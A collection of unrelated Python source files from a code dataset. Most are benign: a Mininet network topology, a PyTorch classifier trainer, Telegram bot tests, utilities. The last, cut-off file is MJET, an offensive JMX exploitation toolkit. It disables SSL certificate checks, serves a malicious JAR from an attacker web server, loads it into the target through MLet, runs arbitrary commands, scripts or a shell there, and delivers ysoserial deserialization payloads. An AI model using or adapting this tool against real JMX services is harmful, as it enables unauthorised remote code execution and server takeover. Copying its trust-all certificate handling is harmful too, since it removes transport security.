parent_pred_pair[child] = pred[entity]['_id']
if len(g[child]) > 0:
tree_Navigate(g, g[child], dictList, parent_pred_pair, child, entity)
else: raise IndexError(parent +' not found in ' + parent_pred_pair)
except ConnectionError as ce:
print(ce)
except Exception as e:
print(e)
def getIfExists(dict, key):
return dict[key] if key in dict and not dict[key]==None else ''
def main():
logging.basicConfig(filename='populateApiIyengarJournal.log',format='%(asctime)s %(message)s',level=logging.DEBUG)
db = ktm.database
db.create_tables([ktm.Subject, ktm.SubjectSubjectRelation, ktm.SubjectRelatestoSubject, \
ktm.Work, ktm.WorkWorkRelation, ktm.WorkRelatestoWork, \
ktm.SubjectHasWork, ktm.WorkSubjectRelation], safe=True)
logging.debug('Opened knowledgeTree Tables - Subject, SubjectSubjectRelation, Subject-Relates-to-Subject, Work, WorkWorkRelation Work_Relatesto_Work, SubjectHasWork % WorkSubjectRelation')
# subject related entities
srs = ktm.SubjectRelatestoSubject.select()
srsDictList = entity_json_dict_list(srs)
subjects = ktm.Subject.select()
subjectsDictList = entity_json_dict_list(subjects)
# work related entities
wrw = ktm.WorkRelatestoWork.select()
wrwDictList = entity_json_dict_list(wrw)
works = ktm.Work.select()
worksDictList = entity_json_dict_list(works)
# person related entities
prp = ktm.PersonRelatestoPerson.select()
prpDictList = entity_json_dict_list(prp)
persons = ktm.Person.select()
personsDictList = entity_json_dict_list(persons)
# logging.debug('populated Subject, Work, Person and related in-memory tables')
graph_subject = refreshGraph(subjectsDictList, srsDictList)
tree_Navigate(graph_subject, graph_subject['aum'], subjectsDictList, {'aum':'1001'}, 'aum')
graph_work = refreshGraph(worksDictList, wrwDictList, entity='work')
tree_Navigate(graph_work, graph_work['all'], worksDictList, {'all':'1001'}, 'all', entity='work')
graph_person = refreshGraph(personsDictList, prpDictList, entity='person')
tree_Navigate(graph_person, graph_person['all'], personsDictList, {'all':'1001'}, 'all', entity='person')
if __name__ == '__main__':
main()
| StarcoderdataPython |
3370257 | <filename>unit_02/04_object-oriented/3-Advanced_Objects/javascriptobject.py
#
# Object-Oriented Python: Advanced Objects
# Python Techdegree
#
# Created by <NAME> on 12/15/18.
# Copyright (c) 2018 ddApps. All rights reserved.
# ------------------------------------------------
# JavaScript Object Class
# use javascript dot "." notation to access a dictionary entry
# ------------------------------------------------
class JavaScriptObject(dict):
def __getattribute__(self, item):
try:
return self[item]
except KeyError:
return super().__getattribute__(item)
jso = JavaScriptObject({"name": "Dulio"})
jso.language = "Python"
print(jso.name)
print(jso.language)
print(jso.fake_attribute)
| StarcoderdataPython |
3340751 | from data_prep import *
# get user input value from commandline
parser = argparse.ArgumentParser()
parser.add_argument('data_dir')
parser.add_argument('--save_dir')
parser.add_argument('--arch')
parser.add_argument('--learning_rate')
parser.add_argument('--hidden_units')
parser.add_argument('--epochs')
parser.add_argument('--gpu')
args = parser.parse_args()
data_dir = args.data_dir
save_dir = args.save_dir
arch = args.arch
learning_rate = args.learning_rate
hidden_units = args.hidden_units
epochs = args.epochs
device = args.gpu
# user did not provide value, set default
if (arch == "vgg16"):
input_size = 25088
output_size = 102
elif (arch == "densenet121"):
input_size = 1024
output_size = 102
else:
print("Please select model architectures vgg16 or densenet121.")
exit()
if save_dir is None:
save_dir = "model_checkpoint.pth"
if learning_rate is None:
learning_rate = 0.001
else:
learning_rate = float(learning_rate)
if hidden_units is None:
if (arch == "vgg16"):
hidden_units = 4096
elif (arch == "densenet121"):
hidden_units = 500
else:
hidden_units = int(hidden_units)
if epochs is None:
epochs = 10
else:
epochs = int(epochs)
if device is None:
device = "cpu"
if(data_dir == None) or (save_dir == None) or (arch == None) or (learning_rate == None) or (hidden_units == None) or (epochs == None) or (device == None):
print("data_dir, arch , learning_rate, hidden_units, and epochs cannot be none")
exit()
# TODO: Using the image datasets and the trainforms, define the dataloaders
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=32, shuffle=True) for x in ['train', 'valid', 'test']}
# TODO: Build and train your network
if (arch == 'vgg16'):
model = models.vgg16(pretrained=True)
elif (arch == 'densenet121'):
model = models.densenet121(pretrained=True)
model
# TODO: Do validation on the test set
# Freeze parameters so we don't backprop through them
for param in model.parameters():
param.requires_grad = False
# Build a feed-forward network
classifier = nn.Sequential(OrderedDict([('fc1', nn.Linear(input_size, hidden_units)),
('relu', nn.ReLU()),
('dropout1',nn.Dropout(0.2)),
('fc2', nn.Linear(hidden_units, output_size)),
('output', nn.LogSoftmax(dim=1))]))
# Put the classifier on the pretrained network
model.classifier = classifier
# Train a model with a pre-trained network
criterion = nn.NLLLoss()
optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate)
#model.to('cuda')
model.to(device)
print("Start training model")
for e in range(epochs):
for dataset in ['train', 'valid']:
if dataset == 'train':
model.train()
else:
model.eval()
running_loss = 0.0
running_accuracy = 0
for inputs, labels in dataloaders[dataset]:
#inputs, labels = inputs.to('cuda'), labels.to('cuda')
inputs, labels = inputs.to(device), labels.to(device)
optimizer.zero_grad()
# Forward
with torch.set_grad_enabled(dataset == 'train'):
outputs = model(inputs)
_, preds = torch.max(outputs, 1)
loss = criterion(outputs, labels)
# Backward
if dataset == 'train':
loss.backward()
optimizer.step()
running_loss += loss.item() * inputs.size(0)
running_accuracy += torch.sum(preds == labels.data)
dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid', 'test']}
epoch_loss = running_loss / dataset_sizes[dataset]
epoch_accuracy = running_accuracy.double() / dataset_sizes[dataset]
print("Epoch: {}/{}... ".format(e+1, epochs),
"{} Loss: {:.4f} Accurancy: {:.4f}".format(dataset, epoch_loss, epoch_accuracy))
# Do validation on the test set
def check_accuracy_on_test(test_loader):
correct = 0
total = 0
#model.to('cuda:0')
model.to(device)
with torch.no_grad():
for data in test_loader:
images, labels = data
#images, labels = images.to('cuda'), labels.to('cuda')
images, labels = images.to(device), labels.to(device)
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the test images: %d %%' % (100 * correct / total))
check_accuracy_on_test(dataloaders['train'])
# TODO: Save the checkpoint
model.class_to_idx = image_datasets['train'].class_to_idx
model.cpu()
torch.save({'model': arch,
'state_dict': model.state_dict(),
'class_to_idx': model.class_to_idx},
save_dir)
print("Save model to:" + save_dir) | StarcoderdataPython |
4811528 | from datetime import datetime
from database.db import db
class Tweet(db.Model):
tweet_id = db.Column(db.Integer, primary_key=True)
tweet_text = db.Column(db.String(140))
user = db.Column(db.String(140))
timestamp = db.Column(db.DateTime())
created = db.Column(db.DateTime())
def __init__(self, tweet):
self.tweet_id = tweet['data']['id']
self.tweet_text = tweet['data']['text']
self.user = tweet['includes']['users'][0]['username']
self.timestamp = datetime.strptime(tweet['data']['created_at'], '%Y-%m-%dT%H:%M:%S.%fZ')
self.created = datetime.now()
def __repr__(self):
return '<Tweet {}>'.format(self.tweet_id)
| StarcoderdataPython |
1693450 | import functools
import logging
import random
import unittest
from datetime import datetime
from unittest import TestCase, suite
from unittest.mock import patch, MagicMock
from coverage.files import os
from freezegun import freeze_time
from sqlalchemy import create_engine
from telegram import Chat, CallbackQuery
from telegram import Message
from telegram import Update
from telegram import User
from bookbot import config_holder
import json
freezer = freeze_time(datetime(year=2007, month=9, day=29, hour=15), tick=True)
freezer.start()
config_holder.config = json.load(open('resource/config.json'))["TEST"]
from bookbot import bookingbot
from bookbot import dataentities
from bookbot import datacore
from bookbot import dateutilbot
from bookbot.datacore import CallData
def lncmp(self, testCaseClass):
def isTestMethod(attrname, testCaseClass=testCaseClass,
prefix=self.testMethodPrefix):
return attrname.startswith(prefix) and \
callable(getattr(testCaseClass, attrname))
testFnNames = list(filter(isTestMethod, list(testCaseClass.__dict__)))
return testFnNames
patch('unittest.TestLoader.getTestCaseNames', lncmp).start()
class Accumulator:
def __init__(self):
self.current_method = None
self.accum = {}
def append(self, other):
if self.current_method not in self.accum:
self.accum[self.current_method] = []
self.accum[self.current_method].append(other)
def __getitem__(self, item: int):
return self.accum[self.current_method][item]
class BotTest(TestCase):
@classmethod
def setUpClass(cls):
cls.stubs = [
patch('telegram.ext.updater.Updater.start_polling'),
patch('telegram.bot.Bot.send_message', new=send_side_effect),
patch('telegram.bot.Bot.deleteMessage', new=send_side_effect)
]
for x in cls.stubs:
x.start()
bookingbot.main()
cls.dispatcher = bookingbot.dispatcher
cls.repository = bookingbot.repository
global acc
acc = Accumulator()
def setUp(self):
acc.current_method = self._testMethodName
logging.info(f"Now in {acc.current_method}")
def test_date_seq(self):
self.assertEqual(dateutilbot.month_map[1], 'Январь')
self.assertEqual(dateutilbot.month_map[12], 'Декабрь')
def test_book(self):
update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="/book")
self.dispatcher.process_update(update)
self.assertEqual(acc[0][1]['text'], 'На какой месяц?')
self.assertEqual(len(acc[0][1]['reply_markup']['inline_keyboard']), 3)
keyboard = acc[0][1]['reply_markup']['inline_keyboard']
self.assertEqual(keyboard[0][0].text, "Сентябрь")
self.assertEqual(keyboard[1][0].text, "Октябрь")
self.assertEqual(keyboard[2][0].text, "Ноябрь")
def test_echo(self):
update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="random")
self.dispatcher.process_update(update)
self.assertEqual(acc[0][1]['text'], 'Введите /book для того чтобы назначить время')
def test_month_to_day_pick(self):
month_pick_call = acc.accum["test_book"]
update = update_callback_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu",
text="/book",
query_data=datacore.data_as_json(month_pick_call[0][1]["reply_markup"]['inline_keyboard'][0][0].callback_data))
self.dispatcher.process_update(update)
self.assertTrue(153174359 in self.repository.user_data)
self.assertEqual(self.repository.user_stances[153174359], datacore.consts.MONTH_PICKED)
self.assertEqual(self.repository.user_data[153174359][datacore.consts.MONTH_PICKED], 9)
self.assertEqual(self.repository.user_data[153174359][datacore.consts.YEAR_PICKED], 2007)
def test_day_to_time_pick(self):
update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="10")
self.dispatcher.process_update(update)
self.assertEqual(acc[0][1]["text"], "Допустимые значения: 29 - 30")
update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="31")
self.dispatcher.process_update(update)
self.assertEqual(acc[0][1]["text"], "Допустимые значения: 29 - 30")
update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="28")
self.dispatcher.process_update(update)
self.assertEqual(acc[0][1]["text"], "Допустимые значения: 29 - 30")
update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="wrong")
self.dispatcher.process_update(update)
self.assertEqual(acc[0][1]["text"], "Допустимые значения: 29 - 30")
update = update_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu", text="30")
self.dispatcher.process_update(update)
# def test_start_to_end_time_pick(self):
# start_time_pick_call = acc.accum["test_day_to_time_pick"]
# update = update_callback_factory(user_id=153174359, first_name="Nanodesu", usename="Nanodesuizlesu",
# text="/book",
# query_data=datacore.data_as_json(start_time_pick_call[0][1]["reply_markup"]['inline_keyboard'][0][0].callback_data))
def update_factory(user_id, first_name, usename, text=None, time=datetime.now()) -> Update:
return Update(update_id=random.randrange(0, 999999),
message=Message(from_user=User(is_bot=False, id=user_id, first_name=first_name),
message_id=random.randrange(0, 999999), date=time,
chat=Chat(id=user_id, type="private", username=usename, first_name=first_name),
text=text, bot=MagicMock()))
def send_side_effect(*args, **kwargs):
logging.info(f"Proxy args: {args}, {kwargs}")
acc.append([args, kwargs])
def update_callback_factory(user_id, first_name, usename, text=None, time=datetime.now(), query_data: CallData = None):
query_data = query_data.to_json()
return Update(update_id=random.randrange(0, 999999), callback_query=CallbackQuery(id=random.randrange(0, 999999),
message=Message(
from_user=User(is_bot=False,
id=user_id,
first_name=first_name),
message_id=random.randrange(0,
999999),
date=time,
chat=Chat(id=user_id,
type="private",
username=usename,
first_name=first_name),
text=text, bot=MagicMock()),
from_user=User(is_bot=False,
id=user_id,
first_name=first_name),
chat_instance=-random.randrange(0,
999999),
data=query_data),
)
| StarcoderdataPython |
3234498 |
import numpy as np
def sigmaAB(A, uA, B, uB, op='*'):
'''
Calculates the uncertainty of two parameters with uncorrolated
errors propogated through either multiplication or division.
For f = A * B or f = A / B, find sigma_f
Parameters:
A, B - array-like (assumed to be 1D arrays) parameters used in the
function 'f'. Must be same size or broadcastable.
uA, uB - array-like (assumed constants or 1D arrays) of the uncertainty
associated with each measurement of the parameter A or B.
Must be same size as or broadcastable to associated parameter
(uA to A; uB to B)
op - 'Operation' Either '*' or '/' for if
f = A * B
or f = A / B
Returns:
'uf' array-like (assumed to be 1D array) of the propogated uncertainty
of the function 'f' in units of the function 'f' such that 'F = f +/- uf'
See https://en.wikipedia.org/wiki/Propagation_of_uncertainty for more resources
(c) ajr - 06.05.2020
Apache 2.0 - See github.com/unh-mms-rogers/mms-curvature
'''
uAB = np.sqrt(np.power(np.divide(uA,A), 2) + np.power(np.divide(uB,B),2))
if op == '*': f = np.multiply(A,B)
elif op == '/': f = np.divide(A,B)
else:
print("Invalid operator. Must be '*' or '/'")
return None
return uAB, np.abs(np.multiply(uAB, f))
# end
| StarcoderdataPython |
53042 | <gh_stars>0
import coords
import customers
import math
import random
import main
# Test if coods are being created and if their
# lats/lons are in radians after creation
def test_coords():
for i in range(1000):
lat = random.uniform(-90, 90)
lon = random.uniform(-180, 180)
cds = coords.Coords(lat, lon)
assert cds.latitude == math.radians(lat)
assert cds.longitude == math.radians(lon)
# Tests if we have a couple of known distances
# Also tests if the distance is the same on the oposite direction
def test_distance():
c1 = coords.Coords(0, 0)
c2 = coords.Coords(0, 90)
c3 = coords.Coords(0, -90)
assert int(c1.distance(c2)) == 10007
assert int(c2.distance(c1)) == 10007
assert int(c1.distance(c3)) == 10007
assert int(c3.distance(c1)) == 10007
c2 = coords.Coords(0, 180)
c3 = coords.Coords(0, -180)
assert int(c1.distance(c2)) == 20015
assert int(c2.distance(c1)) == 20015
assert int(c1.distance(c3)) == 20015
assert int(c3.distance(c1)) == 20015
# Tests if the customer creation works as intended
def test_customer():
auid = int(random.uniform(0, 1000))
alat = random.uniform(-90, 90)
along = random.uniform(-180, 180)
alice = customers.Customer(auid, 'Alice', coords.Coords(alat, along))
assert alice.user_id == auid
assert alice.name == 'Alice'
assert alice.coords.latitude == math.radians(alat)
assert alice.coords.longitude == math.radians(along)
# Testing the creation of the application
def test_application():
app = main.App()
assert app.office.latitude == math.radians(53.339428)
assert app.office.longitude == math.radians(-6.257664)
# Test if the read_customers command is reading the whole file
def test_read_customers():
app = main.App()
app.read_customers('customers.txt')
assert len(app.customers) == 32
# Test inviting customers in two different distances
def test_invite_near_customers():
app = main.App()
app.read_customers('customers.txt')
app.invite_near_customers(100)
assert len(app.invited) == 16
app.invite_near_customers(50)
assert len(app.invited) == 8
# Testing the output production
def test_write_invited():
app = main.App()
app.read_customers('customers.txt')
app.invite_near_customers(100)
app.write_invited('output.txt')
with open('output.txt', 'r+') as f:
assert len(f.readlines()) == 16
| StarcoderdataPython |
4817163 | """Interact with Pure Fitness/Yoga service.
Usage:
pypuregym location <gym-type> <region-id>
pypuregym schedule <region-id> <location-id> <date>
pypuregym book <region-id> <class-id> <username> <password> [--wait-until <wait>] [--retry <retry>]
Options:
<gym-type> Can be "fitness" or "yoga".
<region-id> Can be "HK", "CN" or "SG".
<location-id> ID of the studio (given with the "location" command).
<date> Date to get the schedule for.
<class-id> Class ID to book.
<username> Your Pure username/email.
<password> Your Pure password.
--wait-until <wait> When booking a class, wait until the specified date time before booking.
--retry <retry> Number of time to retry when booking the class.
""" # noqa
import logging
from docopt import docopt
from pypuregym import __version__
from pypuregym.cli.location import get_location
from pypuregym.cli.schedule import get_schedule
from pypuregym.cli.book import book_class
def main():
"""CLI entry point.
"""
args = docopt(__doc__, version=__version__)
logging.basicConfig(
format='%(asctime)s - %(levelname)s - %(message)s',
level=logging.INFO,
)
if args['location']:
get_location(
gym_type=args['<gym-type>'],
region_id=args['<region-id>'],
)
elif args['schedule']:
get_schedule(
region_id=args['<region-id>'],
location_id=int(args['<location-id>']),
date=args['<date>'],
)
elif args['book']:
book_class(
region_id=args['<region-id>'],
class_id=int(args['<class-id>']),
username=args['<username>'],
password=args['<password>'],
wait_until=args['--wait-until'],
retry=args['--retry'],
)
if __name__ == '__main__':
main()
| StarcoderdataPython |
122203 | <filename>stream/feed/__init__.py
from .feeds import AsyncFeed, Feed
| StarcoderdataPython |
131211 | <gh_stars>0
# -*- coding: utf-8 -*-
"""Branch office topology
terminate switch
| |
hosts switch
|
hosts
Hosts consist of PC+Phones, ATMs, Security devices (camers, etc)
"""
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.node import RemoteController, OVSSwitch
from functools import partial
class MyTopo( Topo ):
"Simple topology example."
def __init__( self, num ):
"Create custom topo."
# Initialize topology
Topo.__init__( self )
# Add hosts and switches
s1 = self.addSwitch( 's1', dpid='%x' % 31)
s2 = self.addSwitch( 's2', dpid='%x' % 32)
self.addLink( s1, s2, 2, 1 )
sec1 = self.addHost( 'sec1', ip='172.16.28.2/27')
sec2 = self.addHost( 'sec2', ip='172.16.28.3/27')
self.addLink( sec1, s1, 0, 3 )
self.addLink( sec2, s1, 0, 4 )
pnum = 5
# Add links halv of hosts to one switch - half to another
for i in range(2, num/2 + 2):
print('i = ',i, ' pnum = ', pnum)
h = self.addHost( 'h%s'%i, ip='172.16.128.%s/26'%i)
t = self.addHost( 't%s'%i, ip='172.16.128.%s/26'%(64+i))
self.addLink( h, s1, 0, pnum )
self.addLink( t, s1, 0, pnum+1 )
pnum += 2
pnum = 4
for i in range(num/2 + 2, num + 2):
print('i = ',i, ' pnum = ', pnum)
h = self.addHost( 'h%s'%i, ip='172.16.128.%s/26'%i)
t = self.addHost( 't%s'%i, ip='172.16.128.%s/26'%(64+i))
self.addLink( h, s2, 0, pnum )
self.addLink( t, s2, 0, pnum+1 )
pnum += 2
def runMinimalTopo():
CONTROLLER_IP = '192.168.2.4'
num = 5
topo = MyTopo(num) # Create an instance of our topology
net = Mininet(topo = topo,
controller=lambda name: RemoteController( name, ip=CONTROLLER_IP),
switch=partial(OVSSwitch, protocols='OpenFlow13'),
autoSetMacs=True )
net.start()
for i in range(2, num + 2):
print('i = ',i)
net.get('h%s'%i).cmd('ip route add default via 172.16.128.1')
net.get('t%s'%i).cmd('ip route add default via 172.16.128.65')
net.get('sec1').cmd('ip route add default via 172.16.28.1')
net.get('sec2').cmd('ip route add default via 172.16.28.1')
#для связи с внешним интерфейсом ВМ
# ovs возьмет самый первый не используемый порт
net.get('s1').cmd('ovs-vsctl add-port s1 eth1')
cli = CLI(net)
# After the user exits the CLI, shutdown the network.
net.stop()
if __name__ == '__main__':
# This runs if this file is executed directly
setLogLevel( 'info' )
runMinimalTopo()
topos = { 'mytopo': MyTopo } | StarcoderdataPython |
1615498 | <reponame>Minkov/python-oop<gh_stars>1-10
import functools
def log(func):
@functools.wraps(func)
def wrapper():
print(f'{func.__name__} executed')
return func()
return wrapper
@log
def f1():
return 5
print(f1())
def f2():
return 5
f2 = log(f2)
print(f2())
| StarcoderdataPython |
153334 | <reponame>kevinastone/generator<filename>generator/util.py
import fnmatch
def _wildcard_filter(names, *ignore_patterns):
for name in names:
if any(fnmatch.fnmatchcase(name, pattern) for pattern in ignore_patterns):
continue
yield name
def copy_attributes(source, destination, ignore_patterns=[]):
"""
Copy the attributes from a source object to a destination object.
"""
for attr in _wildcard_filter(dir(source), *ignore_patterns):
setattr(destination, attr, getattr(source, attr))
| StarcoderdataPython |
29233 | from .item import Item
from .entry import Entry
from copy import copy
class Record(object):
"""
A Record, the tuple of an entry and it's item
Records are useful for representing the latest entry for a
field value.
Records are serialised as the merged entry and item
"""
def __init__(self, entry=None, item=None):
self.entry = entry
self.item = item
@property
def primitive(self):
"""Record as Python primitive."""
primitive = copy(self.item.primitive)
primitive.update(self.entry.primitive)
return primitive
@primitive.setter
def primitive(self, primitive):
"""Record from Python primitive."""
self.entry = Entry()
self.entry.primitive = primitive
primitive = copy(primitive)
for field in self.entry.fields:
del primitive[field]
self.item = Item()
self.item.primitive = primitive
| StarcoderdataPython |
1679542 | # jmx stuff
from javax.management.remote import JMXServiceURL
from javax.management.remote import JMXConnector
from javax.management.remote import JMXConnectorFactory
from javax.management import ObjectName
from java.lang import String
from java.lang import Object
from jarray import array
from java.io import IOException
from javax.net.ssl import TrustManager, X509TrustManager
from javax.net.ssl import SSLContext
# BaseHTTPServer needed to serve mlets
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer
from threading import Thread
import sys
import os
import time
import jarray
from jarray import array
# Extra
import argparse
import base64
import random
import string
authorSignature = 'MJET - MOGWAI LABS JMX Exploitation Toolkit\n'
authorSignature += '==========================================='
class TrustAllX509TrustManager(X509TrustManager):
def checkClientTrusted(self, chain, auth):
pass
def checkServerTrusted(self,chain,auth):
pass
def getAcceptedIssuers(self):
return None
### AUX ###
def connectToJMX(args):
# Basic JMX connection, always required
trust_managers = array([TrustAllX509TrustManager()], TrustManager)
sc = SSLContext.getInstance("SSL")
sc.init(None, trust_managers, None)
SSLContext.setDefault(sc)
jmx_url = JMXServiceURL("service:jmx:rmi:///jndi/rmi://" + args.targetHost + ":" + args.targetPort + "/jmxrmi")
print "[+] Connecting to: " + str(jmx_url)
try:
# for passing credentials for password
if args.jmxpassword and args.jmxrole:
print ("[+] Using credentials: " + str(args.jmxrole) + " / " + str(args.jmxpassword))
credentials = array([args.jmxrole,args.jmxpassword],String)
environment = {JMXConnector.CREDENTIALS:credentials}
jmx_connector = JMXConnectorFactory.connect(jmx_url, environment)
else:
jmx_connector = JMXConnectorFactory.connect(jmx_url)
print "[+] Connected: " + str(jmx_connector.getConnectionId())
bean_server = jmx_connector.getMBeanServerConnection()
return bean_server
except:
print "[-] Error: Can't connect to remote service"
if "Authentication failed! Invalid username or password" in str(sys.exc_info()[1]):
print "[-] Authentication failed! Invalid username or password"
sys.exit(-1)
##########
### WEBSERVER MODE ###
def webserverMode(args):
startWebserver(args)
raw_input("[+] Press Enter to stop the service\n")
### /WEBSERVER MODE ###
### INSTALL MODE ###
def installMode(args):
startWebserver(args)
bean_server = connectToJMX(args)
installMBean(args, bean_server)
print "[+] Done"
def installMBean(args, bean_server):
# Installation, load javax.management.loading.MLet to install additional MBeans
# If loading fails, the Mlet is already loaded...
try:
mlet_bean = bean_server.createMBean("javax.management.loading.MLet", None)
except:
# MLet Bean can't be created because it already exists
mlet_bean = bean_server.getObjectInstance(ObjectName("DefaultDomain:type=MLet"))
print "[+] Loaded " + str(mlet_bean.getClassName())
# Install payload Mlet via getMbeansFromURL
# pass the URL of the web server
print "[+] Loading malicious MBean from " + args.payload_url
print "[+] Invoking: "+ mlet_bean.getClassName() + ".getMBeansFromURL"
inv_array1 = jarray.zeros(1, Object)
inv_array1[0] = args.payload_url
inv_array2 = jarray.zeros(1, String)
inv_array2[0] = String.canonicalName
resource = bean_server.invoke(mlet_bean.getObjectName(), "getMBeansFromURL", inv_array1, inv_array2)
# Check if the Mlet was loaded successfully
for res in resource:
if res.__class__.__name__ == "InstanceAlreadyExistsException":
print "[+] Object instance already existed, no need to install it a second time"
elif res.__class__.__name__ == "ObjectInstance":
print "[+] Successfully loaded MBean" + str(res.getObjectName())
# Change the password from "<PASSWORD>" to the new value
print "[+] Changing default password..."
changePassword("<PASSWORD>", args.password, bean_server)
else:
print res
def startWebserver(args):
# Start a web server on all ports in a seperate thread
# Only needed during installation
print "[+] Starting webserver at port " + str(args.payload_port)
mletHandler = MakeHandlerClass(args.payload_url)
mlet_webserver = HTTPServer(('', int(args.payload_port)), mletHandler)
webserver_thread = Thread(target = mlet_webserver.serve_forever)
webserver_thread.daemon = True
try:
webserver_thread.start()
except KeyboardInterrupt:
mlet_webserver.shutdown()
sys.exit(0)
def MakeHandlerClass(base_url):
#This class will handles any incoming request from
#the JMX service
# Needed during installation of the JAR
class CustomHandler(BaseHTTPRequestHandler):
def __init__(self, *args, **kwargs):
self._base_url = base_url
self.jar_name = ''.join(random.choice(string.ascii_lowercase) for _ in range(8)) + '.jar'
BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
#Handler for the GET requests
def do_GET(self):
if self.path=="/":
mlet_code = '<html><mlet code="de.mogwailabs.MogwaiLabsMJET.MogwaiLabsPayload" archive="' + self.jar_name + '" name="MogwaiLabs:name=payload,id=1" codebase="' + self._base_url + '"></mlet></html>'
self.send_response(200)
self.send_header('Pragma', 'no-cache')
self.end_headers()
self.wfile.write(mlet_code)
elif self.path.endswith('.jar'):
f = open("./payloads/MogwaiLabsMJET-MLet.jar")
self.send_response(200)
self.send_header('Content-type', 'application/jar')
self.end_headers()
self.wfile.write(f.read())
f.close()
else:
self.send_error(404, 'File not found: ' + self.path)
#
# except IOError:
# self.send_error(404,'File Not Found: %s' % self.path)
return CustomHandler
### /INSTALL MODE ###
### UNINSTALL MODE ###
def uninstallMode(args):
bean_server = connectToJMX(args)
uninstallMBeans(bean_server)
print "[+] Done"
def uninstallMBeans(bean_server):
try:
bean_server.unregisterMBean(ObjectName("MogwaiLabs:name=payload,id=1"))
except:
print "[-] Error: The MBean is not registered in the target server"
sys.exit(0)
print "[+] MBean correctly uninstalled"
### /UNINSTALL MODE ###
### CHANGE PASSWORD MODE ###
def changePasswordMode(args):
bean_server = connectToJMX(args)
changePassword(args.password, args.newpass, bean_server)
print "[+] Done"
def changePassword(password, newpass, bean_server):
# Payload execution
# Load the Payload Met and invoke a method on it
mlet_bean = bean_server.getObjectInstance(ObjectName("MogwaiLabs:name=payload,id=1"))
print "[+] Loaded " + str(mlet_bean.getClassName())
inv_array1 = jarray.zeros(2, Object)
inv_array1[0] = password
inv_array1[1] = <PASSWORD>pass
inv_array2 = jarray.zeros(2, String)
inv_array2[0] = String.canonicalName
inv_array2[1] = String.canonicalName
resource = bean_server.invoke(mlet_bean.getObjectName(), "changePassword", inv_array1, inv_array2)
if str(resource) == "True":
print "[+] Successfully changed password"
else:
print "[-] Unable to change password"
sys.stdout.flush()
### /CHANGE PASSWORD MODE ###
### COMMAND MODE ###
def commandMode(args):
bean_server = connectToJMX(args)
executeCommand(args.password, args.cmd, bean_server)
print "[+] Done"
def executeCommand(password, cmd, bean_server):
# Payload execution
# Load the Payload MLet and invoke a method on it
mlet_bean = bean_server.getObjectInstance(ObjectName("MogwaiLabs:name=payload,id=1"))
print "[+] Loaded " + str(mlet_bean.getClassName())
print "[+] Executing command: " + cmd
inv_array1 = jarray.zeros(2, Object)
inv_array1[0] = password
inv_array1[1] = cmd
inv_array2 = jarray.zeros(2, String)
inv_array2[0] = String.canonicalName
inv_array2[1] = String.canonicalName
resource = bean_server.invoke(mlet_bean.getObjectName(), "runCMD", inv_array1, inv_array2)
print resource
sys.stdout.write("\n")
sys.stdout.flush()
### /COMMAND MODE ###
### JAVASCRIPT MODE ###
def scriptMode(args):
bean_server = connectToJMX(args)
with open(args.filename, 'r') as myfile:
script=myfile.read()
executeJS(args.password, script, bean_server)
print "[+] Done"
def executeJS(password, js, bean_server):
# Payload execution
# Load the Payload MLet and invoke a method on it
mlet_bean = bean_server.getObjectInstance(ObjectName("MogwaiLabs:name=payload,id=1"))
print "[+] Loaded " + str(mlet_bean.getClassName())
print "[+] Executing script"
inv_array1 = jarray.zeros(2, Object)
inv_array1[0] = password
inv_array1[1] = js
inv_array2 = jarray.zeros(2, String)
inv_array2[0] = String.canonicalName
inv_array2[1] = String.canonicalName
resource = bean_server.invoke(mlet_bean.getObjectName(), "runJS", inv_array1, inv_array2)
if resource is not None:
print resource
sys.stdout.write("\n")
sys.stdout.flush()
### /JAVASCRIPT MODE ###
### SHELL MODE ###
def shellMode(args):
bean_server = connectToJMX(args)
startShell(args.password, bean_server)
print "[+] Done"
def startShell(password, bean_server):
print "[+] Use command 'exit_shell' to exit the shell"
in_command_loop = True
while in_command_loop:
cmd = raw_input(">>> ")
if cmd == 'exit_shell':
in_command_loop = False
else:
executeCommand(password, cmd, bean_server)
### /SHELL MODE ###
### DESERIALIZATION MODE ###
def deserializationMode(args):
if not os.path.isfile('./ysoserial.jar'):
print "[-] Error: Did not find ysoserial.jar in this folder. Please download it from https://github.com/frohoff/ysoserial"
sys.exit(1)
sys.path.append("./ysoserial.jar")
print "[+] Added ysoserial API capacities"
from ysoserial.payloads.ObjectPayload import Utils
# Connect to the JMX server
bean_server = connectToJMX(args)
# Generate deserialization object with ysoserial.jar
payload_object = Utils.makePayloadObject(args.gadget, args.cmd)
# Command execution
# Load default MLet java.util.logging and invoke method getLoggerLevel on it
mlet_bean = bean_server.getObjectInstance(ObjectName("java.util.logging:type=Logging"))
print "[+] Loaded " + str(mlet_bean.getClassName())
print "[+] Passing ysoserial object as parameter to getLoggerLevel(String loglevel)"
inv_array1 = jarray.zeros(1, Object)
inv_array1[0] = payload_object
inv_array2 = jarray.zeros(1, String)
inv_array2[0] = String.canonicalName
try:
resource = bean_server.invoke(mlet_bean.getObjectName(), "getLoggerLevel", inv_array1, inv_array2)
except:
if "argument type mismatch" in str(sys.exc_info()[1]):
print "[+] Got an argument type mismatch exception - this is expected"
elif "Access denied! Invalid access level" in str(sys.exc_info()[1]):
print "[+] Got an access denied exception - this is expected"
else:
print "[-] Got a " + str(sys.exc_info()[1]) + "exception, exploitation failed"
sys.stdout.write("\n")
sys.stdout.flush()
print "[+] Done"
### /DESERIALIZATION MODE ###
### PARSER ###
# Map for clarity's sake
def arg_install_mode(args):
installMode(args)
def arg_command_mode(args):
commandMode(args)
def arg_script_mode(args):
scriptMode(args)
